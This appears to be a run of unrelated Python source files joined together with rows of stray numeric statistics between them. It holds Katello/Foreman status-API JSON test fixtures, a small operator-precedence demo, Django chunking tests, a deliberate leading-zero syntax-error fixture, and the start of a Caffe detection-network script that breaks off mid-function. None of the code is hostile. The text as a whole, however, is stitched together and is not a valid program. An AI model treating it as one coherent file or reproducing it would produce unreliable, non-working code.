                    "pulp_auth": {"status": "ok", "duration_ms": "16"},
                    "candlepin": {"status": "ok", "duration_ms": "10"},
                    "candlepin_auth": {"status": "ok", "duration_ms": "12"},
                    "foreman_tasks": {"status": "ok", "duration_ms": "3"},
                    "katello_events": {
                        "status": "ok",
                        "message": "0 Processed, 0 Failed",
                        "duration_ms": "0",
                    },
                    "candlepin_events": {
                        "status": "ok",
                        "message": "0 Processed, 0 Failed",
                        "duration_ms": "0",
                    },
                },
                "status": "ok",
            },
        }
    }
)
# /api/statuses response fixture with NO "smart_proxies" entry at all —
# i.e. a deployment without any capsules; otherwise mirrors
# STATUSES_RESPONSE_BODY.
NO_CAPSULES_STATUSES_RESPONSE_BODY = json.dumps(
    {
        "results": {
            "foreman": {
                "version": "1.24.0",
                "api": {"version": "v2"},
                "plugins": [
                    "Foreman plugin: foreman-tasks, 0.17.5, Ivan Ne\u010das, The goal of this plugin is to unify the way of showing task statuses across the Foreman instance.\nIt defines Task model for keeping the information about the tasks and Lock for assigning the tasks\nto resources. The locking allows dealing with preventing multiple colliding tasks to be run on the\nsame resource. It also optionally provides Dynflow infrastructure for using it for managing the tasks.\n",
                    "Foreman plugin: foreman_ansible, 4.0.3, Daniel Lobato Garcia, Ansible integration with Foreman",
                    "Foreman plugin: foreman_bootdisk, 16.0.0, Dominic Cleal, Plugin for Foreman that creates iPXE-based boot disks to provision hosts without the need for PXE infrastructure.",
                    "Foreman plugin: foreman_discovery, 16.0.1, Aditi Puntambekar, alongoldboim, Alon Goldboim, amirfefer, Amit Karsale, Amos Benari, Avi Sharvit, Bryan Kearney, bshuster, Daniel Lobato, Daniel Lobato Garcia, Daniel Lobato Garc\u00eda, Danny Smit, David Davis, Djebran Lezzoum, Dominic Cleal, Eric D. Helms, Ewoud Kohl van Wijngaarden, Frank Wall, Greg Sutcliffe, ChairmanTubeAmp, Ido Kanner, imriz, Imri Zvik, Ivan Ne\u010das, Joseph Mitchell Magen, June Zhang, kgaikwad, Lars Berntzon, ldjebran, Lukas Zapletal, Luk\u00e1\u0161 Zapletal, Marek Hulan, Marek Hul\u00e1n, Martin Ba\u010dovsk\u00fd, Matt Jarvis, Michael Moll, Nick, odovzhenko, Ohad Levy, Ondrej Prazak, Ond\u0159ej Ezr, Ori Rabin, orrabin, Partha Aji, Petr Chalupa, Phirince Philip, Rahul Bajaj, Robert Antoni Buj Gelonch, Scubafloyd, Sean O\\'Keeffe, Sebastian Gra\u0308\u00dfl, Shimon Shtein, Shlomi Zadok, Stephen Benjamin, Swapnil Abnave, Thomas Gelf, Timo Goebel, Tomas Strych, Tom Caspy, Tomer Brisker, and Yann C\u00e9zard, MaaS Discovery Plugin engine for Foreman",
                    "Foreman plugin: foreman_hooks, 0.3.15, Dominic Cleal, Plugin engine for Foreman that enables running custom hook scripts on Foreman events",
                    "Foreman plugin: foreman_inventory_upload, 1.0.2, Inventory upload team, Foreman plugin that process & upload data to cloud based host inventory",
                    "Foreman plugin: foreman_openscap, 2.0.2, slukasik@redhat.com, Foreman plug-in for managing security compliance reports",
                    "Foreman plugin: foreman_remote_execution, 2.0.6, Foreman Remote Execution team, A plugin bringing remote execution to the Foreman, completing the config management functionality with remote management functionality.",
                    "Foreman plugin: foreman_templates, 7.0.5, Greg Sutcliffe, Engine to synchronise provisioning templates from GitHub",
                    "Foreman plugin: foreman_theme_satellite, 5.0.1.5, Alon Goldboim, Shimon Stein, Theme changes for Satellite 6.",
                    "Foreman plugin: foreman_virt_who_configure, 0.5.0, Foreman virt-who-configure team, A plugin to make virt-who configuration easy",
                    "Foreman plugin: katello, 3.14.0.1, N/A, Katello adds Content and Subscription Management to Foreman. For this it relies on Candlepin and Pulp.",
                    "Foreman plugin: redhat_access, 2.2.8, Lindani Phiri, This plugin adds Red Hat Access knowledge base search, case management and diagnostics to Foreman",
                ],
                "compute_resources": [
                    {
                        "name": "libvirt",
                        "status": "ok",
                        "duration_ms": "85",
                        "errors": [],
                    }
                ],
                "database": {"active": True, "duration_ms": "0"},
            },
            "katello": {
                "version": "3.14.0.1",
                "timeUTC": "2020-02-18 19:52:16 UTC",
                "services": {
                    "pulp": {"status": "ok", "duration_ms": "31"},
                    "pulp_auth": {"status": "ok", "duration_ms": "16"},
                    "candlepin": {"status": "ok", "duration_ms": "10"},
                    "candlepin_auth": {"status": "ok", "duration_ms": "12"},
                    "foreman_tasks": {"status": "ok", "duration_ms": "3"},
                    "katello_events": {
                        "status": "ok",
                        "message": "0 Processed, 0 Failed",
                        "duration_ms": "0",
                    },
                    "candlepin_events": {
                        "status": "ok",
                        "message": "0 Processed, 0 Failed",
                        "duration_ms": "0",
                    },
                },
                "status": "ok",
            },
        }
    }
)
# /api/statuses response fixture whose smart proxy lacks the "ansible"
# feature in its "features" map; otherwise mirrors STATUSES_RESPONSE_BODY.
NO_ANSIBLE_STATUSES_RESPONSE_BODY = json.dumps(
    {
        "results": {
            "foreman": {
                "version": "1.24.0",
                "api": {"version": "v2"},
                "plugins": [
                    "Foreman plugin: foreman-tasks, 0.17.5, Ivan Ne\u010das, The goal of this plugin is to unify the way of showing task statuses across the Foreman instance.\nIt defines Task model for keeping the information about the tasks and Lock for assigning the tasks\nto resources. The locking allows dealing with preventing multiple colliding tasks to be run on the\nsame resource. It also optionally provides Dynflow infrastructure for using it for managing the tasks.\n",
                    "Foreman plugin: foreman_ansible, 4.0.3, Daniel Lobato Garcia, Ansible integration with Foreman",
                    "Foreman plugin: foreman_bootdisk, 16.0.0, Dominic Cleal, Plugin for Foreman that creates iPXE-based boot disks to provision hosts without the need for PXE infrastructure.",
                    "Foreman plugin: foreman_discovery, 16.0.1, Aditi Puntambekar, alongoldboim, Alon Goldboim, amirfefer, Amit Karsale, Amos Benari, Avi Sharvit, Bryan Kearney, bshuster, Daniel Lobato, Daniel Lobato Garcia, Daniel Lobato Garc\u00eda, Danny Smit, David Davis, Djebran Lezzoum, Dominic Cleal, Eric D. Helms, Ewoud Kohl van Wijngaarden, Frank Wall, Greg Sutcliffe, ChairmanTubeAmp, Ido Kanner, imriz, Imri Zvik, Ivan Ne\u010das, Joseph Mitchell Magen, June Zhang, kgaikwad, Lars Berntzon, ldjebran, Lukas Zapletal, Luk\u00e1\u0161 Zapletal, Marek Hulan, Marek Hul\u00e1n, Martin Ba\u010dovsk\u00fd, Matt Jarvis, Michael Moll, Nick, odovzhenko, Ohad Levy, Ondrej Prazak, Ond\u0159ej Ezr, Ori Rabin, orrabin, Partha Aji, Petr Chalupa, Phirince Philip, Rahul Bajaj, Robert Antoni Buj Gelonch, Scubafloyd, Sean O\\'Keeffe, Sebastian Gra\u0308\u00dfl, Shimon Shtein, Shlomi Zadok, Stephen Benjamin, Swapnil Abnave, Thomas Gelf, Timo Goebel, Tomas Strych, Tom Caspy, Tomer Brisker, and Yann C\u00e9zard, MaaS Discovery Plugin engine for Foreman",
                    "Foreman plugin: foreman_hooks, 0.3.15, Dominic Cleal, Plugin engine for Foreman that enables running custom hook scripts on Foreman events",
                    "Foreman plugin: foreman_inventory_upload, 1.0.2, Inventory upload team, Foreman plugin that process & upload data to cloud based host inventory",
                    "Foreman plugin: foreman_openscap, 2.0.2, slukasik@redhat.com, Foreman plug-in for managing security compliance reports",
                    "Foreman plugin: foreman_remote_execution, 2.0.6, Foreman Remote Execution team, A plugin bringing remote execution to the Foreman, completing the config management functionality with remote management functionality.",
                    "Foreman plugin: foreman_templates, 7.0.5, Greg Sutcliffe, Engine to synchronise provisioning templates from GitHub",
                    "Foreman plugin: foreman_theme_satellite, 5.0.1.5, Alon Goldboim, Shimon Stein, Theme changes for Satellite 6.",
                    "Foreman plugin: foreman_virt_who_configure, 0.5.0, Foreman virt-who-configure team, A plugin to make virt-who configuration easy",
                    "Foreman plugin: katello, 3.14.0.1, N/A, Katello adds Content and Subscription Management to Foreman. For this it relies on Candlepin and Pulp.",
                    "Foreman plugin: redhat_access, 2.2.8, Lindani Phiri, This plugin adds Red Hat Access knowledge base search, case management and diagnostics to Foreman",
                ],
                # capsule present but its features omit "ansible"
                "smart_proxies": [
                    {
                        "name": "foreman-nuc1.usersys.redhat.com",
                        "status": "ok",
                        "duration_ms": "138",
                        "version": "1.24.0",
                        "features": {
                            "pulp": "1.5.0",
                            "dynflow": "0.2.4",
                            "discovery": "1.0.5",
                            "openscap": "0.7.2",
                            "ssh": "0.2.1",
                            "dns": "1.24.0",
                            "templates": "1.24.0",
                            "tftp": "1.24.0",
                            "dhcp": "1.24.0",
                            "puppetca": "1.24.0",
                            "puppet": "1.24.0",
                            "logs": "1.24.0",
                            "httpboot": "1.24.0",
                        },
                        "failed_features": {},
                    }
                ],
                "compute_resources": [
                    {
                        "name": "libvirt",
                        "status": "ok",
                        "duration_ms": "85",
                        "errors": [],
                    }
                ],
                "database": {"active": True, "duration_ms": "0"},
            },
            "katello": {
                "version": "3.14.0.1",
                "timeUTC": "2020-02-18 19:52:16 UTC",
                "services": {
                    "pulp": {"status": "ok", "duration_ms": "31"},
                    "pulp_auth": {"status": "ok", "duration_ms": "16"},
                    "candlepin": {"status": "ok", "duration_ms": "10"},
                    "candlepin_auth": {"status": "ok", "duration_ms": "12"},
                    "foreman_tasks": {"status": "ok", "duration_ms": "3"},
                    "katello_events": {
                        "status": "ok",
                        "message": "0 Processed, 0 Failed",
                        "duration_ms": "0",
                    },
                    "candlepin_events": {
                        "status": "ok",
                        "message": "0 Processed, 0 Failed",
                        "duration_ms": "0",
                    },
                },
                "status": "ok",
            },
        }
    }
)
# Test fixture: a Satellite/Katello "statuses" API response, serialized to a
# JSON string.  It mirrors the healthy fixture above, except that the smart
# proxy (capsule) reports "status": "error" — i.e. the capsule is down —
# while every other component still reports "ok".  (NOTE(review): this payload
# also lists an "ansible" feature the healthy fixture does not; presumably
# intentional, verify against the consumer.)
DOWN_CAPSULE_STATUSES_RESPONSE_BODY = json.dumps(
    {
        "results": {
            "foreman": {
                "version": "1.24.0",
                "api": {"version": "v2"},
                "plugins": [
                    "Foreman plugin: foreman-tasks, 0.17.5, Ivan Ne\u010das, The goal of this plugin is to unify the way of showing task statuses across the Foreman instance.\nIt defines Task model for keeping the information about the tasks and Lock for assigning the tasks\nto resources. The locking allows dealing with preventing multiple colliding tasks to be run on the\nsame resource. It also optionally provides Dynflow infrastructure for using it for managing the tasks.\n",
                    "Foreman plugin: foreman_ansible, 4.0.3, Daniel Lobato Garcia, Ansible integration with Foreman",
                    "Foreman plugin: foreman_bootdisk, 16.0.0, Dominic Cleal, Plugin for Foreman that creates iPXE-based boot disks to provision hosts without the need for PXE infrastructure.",
                    "Foreman plugin: foreman_discovery, 16.0.1, Aditi Puntambekar, alongoldboim, Alon Goldboim, amirfefer, Amit Karsale, Amos Benari, Avi Sharvit, Bryan Kearney, bshuster, Daniel Lobato, Daniel Lobato Garcia, Daniel Lobato Garc\u00eda, Danny Smit, David Davis, Djebran Lezzoum, Dominic Cleal, Eric D. Helms, Ewoud Kohl van Wijngaarden, Frank Wall, Greg Sutcliffe, ChairmanTubeAmp, Ido Kanner, imriz, Imri Zvik, Ivan Ne\u010das, Joseph Mitchell Magen, June Zhang, kgaikwad, Lars Berntzon, ldjebran, Lukas Zapletal, Luk\u00e1\u0161 Zapletal, Marek Hulan, Marek Hul\u00e1n, Martin Ba\u010dovsk\u00fd, Matt Jarvis, Michael Moll, Nick, odovzhenko, Ohad Levy, Ondrej Prazak, Ond\u0159ej Ezr, Ori Rabin, orrabin, Partha Aji, Petr Chalupa, Phirince Philip, Rahul Bajaj, Robert Antoni Buj Gelonch, Scubafloyd, Sean O\\'Keeffe, Sebastian Gra\u0308\u00dfl, Shimon Shtein, Shlomi Zadok, Stephen Benjamin, Swapnil Abnave, Thomas Gelf, Timo Goebel, Tomas Strych, Tom Caspy, Tomer Brisker, and Yann C\u00e9zard, MaaS Discovery Plugin engine for Foreman",
                    "Foreman plugin: foreman_hooks, 0.3.15, Dominic Cleal, Plugin engine for Foreman that enables running custom hook scripts on Foreman events",
                    "Foreman plugin: foreman_inventory_upload, 1.0.2, Inventory upload team, Foreman plugin that process & upload data to cloud based host inventory",
                    "Foreman plugin: foreman_openscap, 2.0.2, slukasik@redhat.com, Foreman plug-in for managing security compliance reports",
                    "Foreman plugin: foreman_remote_execution, 2.0.6, Foreman Remote Execution team, A plugin bringing remote execution to the Foreman, completing the config management functionality with remote management functionality.",
                    "Foreman plugin: foreman_templates, 7.0.5, Greg Sutcliffe, Engine to synchronise provisioning templates from GitHub",
                    "Foreman plugin: foreman_theme_satellite, 5.0.1.5, Alon Goldboim, Shimon Stein, Theme changes for Satellite 6.",
                    "Foreman plugin: foreman_virt_who_configure, 0.5.0, Foreman virt-who-configure team, A plugin to make virt-who configuration easy",
                    "Foreman plugin: katello, 3.14.0.1, N/A, Katello adds Content and Subscription Management to Foreman. For this it relies on Candlepin and Pulp.",
                    "Foreman plugin: redhat_access, 2.2.8, Lindani Phiri, This plugin adds Red Hat Access knowledge base search, case management and diagnostics to Foreman",
                ],
                "smart_proxies": [
                    {
                        "name": "foreman-nuc1.usersys.redhat.com",
                        # The field that makes this the "down capsule" fixture.
                        "status": "error",
                        "duration_ms": "138",
                        "version": "1.24.0",
                        "features": {
                            "pulp": "1.5.0",
                            "dynflow": "0.2.4",
                            "ansible": "3.0.1",
                            "discovery": "1.0.5",
                            "openscap": "0.7.2",
                            "ssh": "0.2.1",
                            "dns": "1.24.0",
                            "templates": "1.24.0",
                            "tftp": "1.24.0",
                            "dhcp": "1.24.0",
                            "puppetca": "1.24.0",
                            "puppet": "1.24.0",
                            "logs": "1.24.0",
                            "httpboot": "1.24.0",
                        },
                        "failed_features": {},
                    }
                ],
                "compute_resources": [
                    {
                        "name": "libvirt",
                        "status": "ok",
                        "duration_ms": "85",
                        "errors": [],
                    }
                ],
                "database": {"active": True, "duration_ms": "0"},
            },
            "katello": {
                "version": "3.14.0.1",
                "timeUTC": "2020-02-18 19:52:16 UTC",
                "services": {
                    "pulp": {"status": "ok", "duration_ms": "31"},
                    "pulp_auth": {"status": "ok", "duration_ms": "16"},
                    "candlepin": {"status": "ok", "duration_ms": "10"},
                    "candlepin_auth": {"status": "ok", "duration_ms": "12"},
                    "foreman_tasks": {"status": "ok", "duration_ms": "3"},
                    "katello_events": {
                        "status": "ok",
                        "message": "0 Processed, 0 Failed",
                        "duration_ms": "0",
                    },
                    "candlepin_events": {
                        "status": "ok",
                        "message": "0 Processed, 0 Failed",
                        "duration_ms": "0",
                    },
                },
                "status": "ok",
            },
        }
    }
)
| 68.250696
| 1,055
| 0.547098
| 2,673
| 24,502
| 4.941265
| 0.14104
| 0.055118
| 0.066626
| 0.035433
| 0.962523
| 0.95374
| 0.950409
| 0.950409
| 0.941323
| 0.941323
| 0
| 0.046085
| 0.343768
| 24,502
| 358
| 1,056
| 68.441341
| 0.775359
| 0
| 0
| 0.707042
| 0
| 0.135211
| 0.633173
| 0.032038
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0.002817
| 0.002817
| 0
| 0.002817
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
62cd399ed2ee690e4c441e0a6e729192b7471332
| 648
|
py
|
Python
|
precedence.py
|
theGreenJedi/practicepy
|
330da97b0c79c3c8792ebb4166ecf2609545e127
|
[
"MIT"
] | null | null | null |
precedence.py
|
theGreenJedi/practicepy
|
330da97b0c79c3c8792ebb4166ecf2609545e127
|
[
"MIT"
] | null | null | null |
precedence.py
|
theGreenJedi/practicepy
|
330da97b0c79c3c8792ebb4166ecf2609545e127
|
[
"MIT"
] | null | null | null |
# Demonstrate how parentheses override Python's default operator precedence
# for *, //, % and ** when combined with + and -.
a = 2
b = 4
c = 8
print(f"\nDefault Order:\t {a} * {c} + {b} = {a * c + b}")
print(f"Forced Order:\t {a} * ( {c} + {b} ) = {a * (c + b)}")
print(f"\nDefault Order:\t {c} // {b} - {a} = {c // b - a}")
print(f"Forced Order:\t {c} // ( {b} - {a} ) = {c // (b - a)}")
print(f"\nDefault Order:\t {c} % {a} + {b} = {c % a + b}")
print(f"Forced Order:\t {c} % ( {a} + {b} ) = {c % (a + b)}")
print(f"\nDefault Order:\t {c} ** {a} + {b} = {c ** a + b}")
print(f"Forced Order:\t {c} ** ( {a} + {b} ) = {c ** (a + b)}")
| 38.117647
| 80
| 0.305556
| 87
| 648
| 2.287356
| 0.137931
| 0.241206
| 0.120603
| 0.38191
| 0.899497
| 0.839196
| 0.798995
| 0.798995
| 0.798995
| 0.482412
| 0
| 0.007109
| 0.348765
| 648
| 16
| 81
| 40.5
| 0.462085
| 0
| 0
| 0
| 0
| 0
| 0.279365
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0
| null | null | 0.727273
| 0
| 0
| 0
| null | 1
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
|
0
| 10
|
c5355b21dd4f4f1c8596499d3596cc4d68b11e26
| 182
|
py
|
Python
|
flashsale/models/__init__.py
|
comecsoftdev/public_python_flashsale_simple_repo
|
48bf2ce13e306091cb5ab60383ae475678e82605
|
[
"MIT"
] | 1
|
2022-02-22T07:31:03.000Z
|
2022-02-22T07:31:03.000Z
|
flashsale/models/__init__.py
|
comecsoftdev/public_python_flashsale_simple_repo
|
48bf2ce13e306091cb5ab60383ae475678e82605
|
[
"MIT"
] | null | null | null |
flashsale/models/__init__.py
|
comecsoftdev/public_python_flashsale_simple_repo
|
48bf2ce13e306091cb5ab60383ae475678e82605
|
[
"MIT"
] | null | null | null |
from flashsale.models import basic_data
from flashsale.models import store
from flashsale.models import product
from flashsale.models import review
from flashsale.models import push
| 30.333333
| 39
| 0.862637
| 26
| 182
| 6
| 0.384615
| 0.416667
| 0.608974
| 0.801282
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.10989
| 182
| 5
| 40
| 36.4
| 0.962963
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
c5635e0e432689b734545d19f97091d19f4c02a1
| 92
|
py
|
Python
|
my_project/my_project/offer/views/__init__.py
|
Govedarski/World-of-books
|
d270b72600a7986387a277dbe01ac8c6d747f662
|
[
"MIT"
] | null | null | null |
my_project/my_project/offer/views/__init__.py
|
Govedarski/World-of-books
|
d270b72600a7986387a277dbe01ac8c6d747f662
|
[
"MIT"
] | null | null | null |
my_project/my_project/offer/views/__init__.py
|
Govedarski/World-of-books
|
d270b72600a7986387a277dbe01ac8c6d747f662
|
[
"MIT"
] | null | null | null |
from my_project.offer.views.cb_views import *
from my_project.offer.views.fb_views import *
| 30.666667
| 45
| 0.826087
| 16
| 92
| 4.5
| 0.5
| 0.166667
| 0.361111
| 0.5
| 0.638889
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.086957
| 92
| 2
| 46
| 46
| 0.857143
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
c56546dbbc50b772ad5efca9285eaf64855e4895
| 3,272
|
py
|
Python
|
tests/test_py_chunk.py
|
movermeyer/nicedjango
|
c38ada1e50efb5ef0874ef063074b621579c2954
|
[
"MIT"
] | 1
|
2016-10-18T18:40:45.000Z
|
2016-10-18T18:40:45.000Z
|
tests/test_py_chunk.py
|
movermeyer/nicedjango
|
c38ada1e50efb5ef0874ef063074b621579c2954
|
[
"MIT"
] | null | null | null |
tests/test_py_chunk.py
|
movermeyer/nicedjango
|
c38ada1e50efb5ef0874ef063074b621579c2954
|
[
"MIT"
] | 1
|
2018-03-05T01:21:23.000Z
|
2018-03-05T01:21:23.000Z
|
from nicedjango.utils.py.chunk import as_chunks, sliceable_as_chunks
from nicedjango.utils.py.iter import map_attr
def test_as_chunks_unsized():
    """as_chunks over a bare iterator: total/chunk sizes stay unknown (0)."""
    source = iter([1, 2, 3, 4, 5, 6, 7, 8, 9])
    result = list(as_chunks(source, 4))
    assert result == [[1, 2, 3, 4], [5, 6, 7, 8], [9]]
    expected_attrs = {
        'cpos': [1, 2, 3],
        'csize': [0, 0, 0],
        'pos': [1, 5, 9],
        'to_pos': [4, 8, 9],
        'size': [0, 0, 0],
        'len': [4, 4, 1],
    }
    for attr, values in expected_attrs.items():
        assert values == list(map_attr(result, attr))
def test_as_chunks_sized():
    """as_chunks over a list: chunk count and total size are known."""
    source = [1, 2, 3, 4, 5, 6, 7, 8, 9]
    result = list(as_chunks(source, 4))
    assert result == [[1, 2, 3, 4], [5, 6, 7, 8], [9]]
    expected_attrs = {
        'cpos': [1, 2, 3],
        'csize': [3, 3, 3],
        'pos': [1, 5, 9],
        'to_pos': [4, 8, 9],
        'size': [9, 9, 9],
        'len': [4, 4, 1],
    }
    for attr, values in expected_attrs.items():
        assert values == list(map_attr(result, attr))
def test_sliceable_as_chunks():
    """sliceable_as_chunks yields the same chunks but reports no sizes."""
    source = [1, 2, 3, 4, 5, 6, 7, 8, 9]
    result = list(sliceable_as_chunks(source, 4))
    assert result == [[1, 2, 3, 4], [5, 6, 7, 8], [9]]
    expected_attrs = {
        'cpos': [1, 2, 3],
        'csize': [0, 0, 0],
        'pos': [1, 5, 9],
        'to_pos': [4, 8, 9],
        'size': [0, 0, 0],
        'len': [4, 4, 1],
    }
    for attr, values in expected_attrs.items():
        assert values == list(map_attr(result, attr))
def test_as_chunks_chunk_value():
    """A chunk_value callback transforms each chunk before it is yielded."""
    source = [1, 2, 3, 4, 5, 6, 7, 8, 9]
    result = list(as_chunks(source, 4, chunk_value=lambda vs: map(str, vs)))
    assert result == [['1', '2', '3', '4'], ['5', '6', '7', '8'], ['9']]
def test_sliceable_as_chunks_chunk_value():
    """chunk_value works the same for the sliceable variant."""
    source = [1, 2, 3, 4, 5, 6, 7, 8, 9]
    result = list(sliceable_as_chunks(source, 4, chunk_value=lambda vs: map(str, vs)))
    assert result == [['1', '2', '3', '4'], ['5', '6', '7', '8'], ['9']]
def test_as_chunks_key():
    """A key callback forces a chunk break after every multiple of 4."""
    source = [1, 2, 3, 4, 5, 6, 7, 8, 9]
    result = list(as_chunks(source, 4, key=lambda v: v % 4 == 0))
    assert result == [[1, 2, 3], [4], [5, 6, 7], [8], [9]]
    expected_attrs = {
        'cpos': [1, 2, 3, 4, 5],
        'csize': [3, 3, 4, 4, 5],
        'pos': [1, 4, 5, 8, 9],
        'to_pos': [3, 4, 7, 8, 9],
        'size': [9, 9, 9, 9, 9],
        'len': [3, 1, 3, 1, 1],
    }
    for attr, values in expected_attrs.items():
        assert values == list(map_attr(result, attr))
def test_sliceable_as_chunks_key():
    """key-based chunking for the sliceable variant; sizes stay unknown."""
    source = [1, 2, 3, 4, 5, 6, 7, 8, 9]
    result = list(sliceable_as_chunks(source, 4, key=lambda v: v % 4 == 0))
    assert result == [[1, 2, 3], [4], [5, 6, 7], [8], [9]]
    expected_attrs = {
        'cpos': [1, 2, 3, 4, 5],
        'csize': [0, 0, 0, 0, 0],
        'pos': [1, 4, 5, 8, 9],
        'to_pos': [3, 4, 7, 8, 9],
        'size': [0, 0, 0, 0, 0],
        'len': [3, 1, 3, 1, 1],
    }
    for attr, values in expected_attrs.items():
        assert values == list(map_attr(result, attr))
| 43.626667
| 88
| 0.558985
| 576
| 3,272
| 3.043403
| 0.071181
| 0.123788
| 0.188249
| 0.29093
| 0.922989
| 0.917285
| 0.916144
| 0.916144
| 0.913862
| 0.912721
| 0
| 0.097061
| 0.209658
| 3,272
| 74
| 89
| 44.216216
| 0.58082
| 0
| 0
| 0.65
| 0
| 0
| 0.043704
| 0
| 0
| 0
| 0
| 0
| 0.616667
| 1
| 0.116667
| false
| 0
| 0.033333
| 0
| 0.15
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
c57465cb41977609d27640e14ff0d557ccb9c28e
| 7
|
py
|
Python
|
tests/syntax/integer_with_leading_zero_1.py
|
matan-h/friendly
|
3ab0fc6541c837271e8865e247750007acdd18fb
|
[
"MIT"
] | 287
|
2019-04-08T13:18:29.000Z
|
2021-03-14T19:10:21.000Z
|
tests/syntax/integer_with_leading_zero_1.py
|
matan-h/friendly
|
3ab0fc6541c837271e8865e247750007acdd18fb
|
[
"MIT"
] | 191
|
2019-04-08T14:39:18.000Z
|
2021-03-14T22:14:56.000Z
|
tests/syntax/integer_with_leading_zero_1.py
|
matan-h/friendly
|
3ab0fc6541c837271e8865e247750007acdd18fb
|
[
"MIT"
] | 9
|
2019-04-08T12:54:08.000Z
|
2020-11-20T02:26:27.000Z
|
# NOTE(review): deliberately invalid — integer literals with a leading zero are
# a SyntaxError in Python 3.  Judging by the file path
# (tests/syntax/integer_with_leading_zero_1.py) this is a fixture meant to
# trigger that error; do not "fix" it.
x = 01
| 3.5
| 6
| 0.428571
| 2
| 7
| 1.5
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.5
| 0.428571
| 7
| 1
| 7
| 7
| 0.25
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0
| null | null | 0
| 1
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
3d64bf307b2568150287b72163728212b60311b3
| 68,097
|
py
|
Python
|
remodet_repository_wdh_part/Projects/zhangming@172.16.168/DAPNet.py
|
UrwLee/Remo_experience
|
a59d5b9d6d009524672e415c77d056bc9dd88c72
|
[
"MIT"
] | null | null | null |
remodet_repository_wdh_part/Projects/zhangming@172.16.168/DAPNet.py
|
UrwLee/Remo_experience
|
a59d5b9d6d009524672e415c77d056bc9dd88c72
|
[
"MIT"
] | null | null | null |
remodet_repository_wdh_part/Projects/zhangming@172.16.168/DAPNet.py
|
UrwLee/Remo_experience
|
a59d5b9d6d009524672e415c77d056bc9dd88c72
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
import os
import sys
import math
sys.dont_write_bytecode = True
import caffe
from caffe import layers as L
from caffe import params as P
from caffe.proto import caffe_pb2
sys.path.append('../')
from PyLib.LayerParam.MultiBoxLossLayerParam import *
from PyLib.NetLib.ConvBNLayer import *
from PyLib.NetLib.InceptionLayer import *
from PyLib.NetLib.MultiScaleLayer import *
from PyLib.NetLib.VggNet import VGG16_BaseNet_ChangeChannel
from PyLib.NetLib.YoloNet import YoloNetPart
from BaseNet import *
from AddC6 import *
from DetectorHeader import *
from DAP_Param import *
import numpy as np
from solverParam import truncvalues
# ##############################################################################
# ------------------------------------------------------------------------------
# Final Network
# When True, DAPNet builds the SSD stage-1 (person) detector headers/losses.
flag_train_withperson = True
# When True, DAPNet adds the auxiliary hand branch (conv2_hand + deconv concat).
flag_train_withhand = False
def Deconv(net, from_layer, num_output, group, kernel_size, stride, lr_mult, decay_mult, use_bn, use_scale, use_relu):
    """Append a Deconvolution layer named "<from_layer>_deconv" to *net*,
    optionally followed by in-place BatchNorm, Scale and ReLU layers.

    The net is modified in place; nothing is returned.
    """
    layer_name = from_layer + "_deconv"
    net[layer_name] = L.Deconvolution(
        net[from_layer],
        param=[dict(lr_mult=lr_mult, decay_mult=decay_mult)],
        convolution_param={
            'num_output': num_output,
            'kernel_size': kernel_size,
            'pad': 0,
            'stride': stride,
            'weight_filler': dict(type='gaussian', std=0.01),
            'bias_term': False,
            'group': group,
        })
    top = layer_name
    if use_bn:
        # BatchNorm blobs are frozen (lr_mult=0, decay_mult=0 on all three).
        bn_name = '{}_bn'.format(layer_name)
        net[bn_name] = L.BatchNorm(
            net[top], in_place=True,
            param=[dict(lr_mult=0, decay_mult=0),
                   dict(lr_mult=0, decay_mult=0),
                   dict(lr_mult=0, decay_mult=0)],
            eps=0.001)
        top = bn_name
    if use_scale:
        sb_name = '{}_scale'.format(layer_name)
        net[sb_name] = L.Scale(
            net[top], in_place=True,
            bias_term=True,
            param=[dict(lr_mult=lr_mult, decay_mult=0),
                   dict(lr_mult=lr_mult, decay_mult=0)],
            filler=dict(type='constant', value=1.0),
            bias_filler=dict(type='constant', value=0.2))
